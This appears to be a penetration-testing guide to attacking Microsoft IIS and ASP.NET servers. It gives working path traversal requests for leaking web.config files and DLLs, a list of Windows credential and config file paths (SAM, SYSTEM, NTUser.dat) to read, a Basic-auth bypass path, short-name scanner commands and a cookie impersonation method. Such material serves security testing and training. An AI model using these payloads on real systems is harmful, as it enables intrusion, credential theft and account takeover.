# IIS - Internet Information Services Test executable file extensions: * asp * aspx * config * php ## Internal IP Address disclosure On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address: ``` nc -v domain.com 80 openssl s_client -connect domain.com:443 ``` Response disclosing the internal IP: ``` GET / HTTP/1.0 HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache Location: https://192.168.5.237/owa/ Server: Microsoft-IIS/10.0 X-FEServer: NHEXCHANGE2016 ``` ## Execute .config files You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config) More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) ## IIS Discovery Bruteforce Download the list that I have created: {% file src="../../.gitbook/assets/iisfinal.txt" %} It was created merging the contents of the following lists: [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\ [http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\ [https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\ [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\ [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\ [https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt) Use it without adding any extension, the files that need it have it already. ## Path Traversal ### Leaking source code {% hint style="info" %} As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\ From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\ Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\ Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html) {% endhint %} As any .Net application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identifies every binary file the application uses. ```markup GET /download_page?id=..%2f..%2fweb.config HTTP/1.1 Host: example-mvc-application.minded [...] HTTP/1.1 200 OK [...]
``` In the previous output you can references to several "**assemblyIdentity**". These are files that may be located inside the /bin folder. For example: **/bin/WebGrease.dll.** Other files that could be found in the root directory of a .Net application are **/global.asax** ```markup <%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %> ``` And **/connectionstrings.config** **Note: this file contains passwords!** ```markup ``` #### Namespaces In addition, .Net MVC applications are structured to define **other web.config files**, having the aim to include any declaration for specific namespaces for each set of viewpages, relieving developers to declare “@using” namespaces in every file. ```markup GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1 Host: example-mvc-application.minded [...] HTTP/1.1 200 OK [...]
``` #### Downloading DLLs From a very previous response, the declaration of a **custom namespace** (since other namespaces are defaults) suggests that a DLL called "**WebApplication1**" is present in the /bin directory. ``` GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1 Host: example-mvc-application.minded [...] ``` From the previous output, inside the /bin directory you will also be able to find the Dlls * System.Web.Mvc.dll * System.Web.Mvc.Ajax.dll * System.Web.Mvc.Html.dll * System.Web.Optimization.dll * System.Web.Routing.dll Let's suppose that the previous DLL is importing a namespace called **WebApplication1.Areas.Minded.** an attacker can infer that other web.config files are present in the application, in guessable/default paths as **/area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder. ```markup GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1 Host: example-mvc-application.minded [...] HTTP/1.1 200 OK [...]
``` Note how in the previous output you can see a new namespace called: **WebApplication1.AdditionalFeatures** which indicates that there is another Dll in the /bin folder called **WebApplication1.AdditionalFeatures.dll** ### Common files From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) ``` C:\Apache\conf\httpd.conf C:\Apache\logs\access.log C:\Apache\logs\error.log C:\Apache2\conf\httpd.conf C:\Apache2\logs\access.log C:\Apache2\logs\error.log C:\Apache22\conf\httpd.conf C:\Apache22\logs\access.log C:\Apache22\logs\error.log C:\Apache24\conf\httpd.conf C:\Apache24\logs\access.log C:\Apache24\logs\error.log C:\Documents and Settings\Administrator\NTUser.dat C:\php\php.ini C:\php4\php.ini C:\php5\php.ini C:\php7\php.ini C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf C:\Program Files (x86)\Apache Group\Apache\logs\access.log C:\Program Files (x86)\Apache Group\Apache\logs\error.log C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf C:\Program Files (x86)\Apache Group\Apache2\logs\access.log C:\Program Files (x86)\Apache Group\Apache2\logs\error.log c:\Program Files (x86)\php\php.ini" C:\Program Files\Apache Group\Apache\conf\httpd.conf C:\Program Files\Apache Group\Apache\conf\logs\access.log C:\Program Files\Apache Group\Apache\conf\logs\error.log C:\Program Files\Apache Group\Apache2\conf\httpd.conf C:\Program Files\Apache Group\Apache2\conf\logs\access.log C:\Program Files\Apache Group\Apache2\conf\logs\error.log C:\Program Files\FileZilla Server\FileZilla Server.xml C:\Program Files\MySQL\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.1\my.cnf C:\Program Files\MySQL\MySQL Server 5.1\my.ini C:\Program Files\MySQL\MySQL Server 5.5\my.cnf C:\Program Files\MySQL\MySQL Server 5.5\my.ini C:\Program Files\MySQL\MySQL Server 5.6\my.cnf C:\Program Files\MySQL\MySQL Server 5.6\my.ini C:\Program Files\MySQL\MySQL Server 5.7\my.cnf C:\Program Files\MySQL\MySQL Server 5.7\my.ini C:\Program Files\php\php.ini C:\Users\Administrator\NTUser.dat C:\Windows\debug\NetSetup.LOG C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattended.xml C:\Windows\php.ini C:\Windows\repair\SAM C:\Windows\repair\system C:\Windows\System32\config\AppEvent.evt C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\RegBack\system C:\Windows\System32\config\SAM C:\Windows\System32\config\SecEvent.evt C:\Windows\System32\config\SysEvent.evt C:\Windows\System32\config\SYSTEM C:\Windows\System32\drivers\etc\hosts C:\Windows\System32\winevt\Logs\Application.evtx C:\Windows\System32\winevt\Logs\Security.evtx C:\Windows\System32\winevt\Logs\System.evtx C:\Windows\win.ini C:\xampp\apache\conf\extra\httpd-xampp.conf C:\xampp\apache\conf\httpd.conf C:\xampp\apache\logs\access.log C:\xampp\apache\logs\error.log C:\xampp\FileZillaFTP\FileZilla Server.xml C:\xampp\MercuryMail\MERCURY.INI C:\xampp\mysql\bin\my.ini C:\xampp\php\php.ini C:\xampp\security\webdav.htpasswd C:\xampp\sendmail\sendmail.ini C:\xampp\tomcat\conf\server.xml ``` ## HTTPAPI 2.0 404 Error If you see an error like the following one: ![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. ## Old IIS vulnerabilities worth looking for ### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\ The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files. You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/` ![](<../../.gitbook/assets/image (183).png>) Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf) You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` ### Basic Authentication bypass **Bypass** a Baisc authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php` You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication. ## ASP.NET Trace.AXD enabled debugging ASP.NET include a debugging mode and its file is called `trace.axd`. It keeps a very detailed log of all requests made to an application over a period of time. This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords. [https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/) ![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png) ## ASPXAUTH Cookie ASPXAUTH uses the following info: * **`validationKey`** (string): hex-encoded key to use for signature validation. * **`decryptionMethod`** (string): (default “AES”). * **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros). * **`decryptionKey`** (string): hex-encoded key to use for decryption. However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\ This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).